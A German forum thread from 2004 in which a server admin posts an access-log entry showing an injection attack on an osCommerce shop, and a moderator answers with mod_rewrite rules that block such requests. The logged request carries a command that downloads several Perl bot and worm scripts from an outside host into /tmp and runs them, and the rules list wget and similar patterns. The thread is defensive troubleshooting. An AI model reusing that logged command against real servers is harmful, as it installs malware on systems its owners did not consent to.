Dringend Hilfe, Webserver Absturz durch Hack-Angriff !

Apache, Lighttpd, nginx, Cherokee
Post Reply
mcx
Posts: 57
Joined: 2003-11-14 09:09
 

Dringend Hilfe, Webserver Absturz durch Hack-Angriff !

Post by mcx »

Hallo,

mein Webserver wird seit 2 Tagen ständig zum Absturz gebracht.

folgende Einträge finden sich in den Access-Logs:

Code: Select all

69.72.197.66 - - [26/Dec/2004:14:57:59 +0100] "GET /index.php/cPath/78?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 59825 "-" "LWP::Simple/5.803"
????

SuSE 8.1, Apache 1.3.26

Was kann ich da machen ?

Gruß

Markus
User avatar
Joe User
Project Manager
Project Manager
Posts: 11191
Joined: 2003-02-27 01:00
Location: Hamburg
Contact:
 

Re: Dringend Hilfe, Webserver Absturz durch Hack-Angriff !

Post by Joe User »

Boardsuche nutzen...

Code: Select all

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=%2527 [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):%22test1%22%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.
mcx
Posts: 57
Joined: 2003-11-14 09:09
 

Re: Dringend Hilfe, Webserver Absturz durch Hack-Angriff !

Post by mcx »

Hallo,

habe die entsprechenden Rewrite Rules in meine Virtual Hosts und den SSL-Proxy eingetragen. Ich hoffe das es was bringt.

Frohe Weihnachten zusammen.

Gruß

Markus
mcx
Posts: 57
Joined: 2003-11-14 09:09
 

Re: Dringend Hilfe, Webserver Absturz durch Hack-Angriff !

Post by mcx »

es hat geklappt, server läuft stabil ....

Danke
Post Reply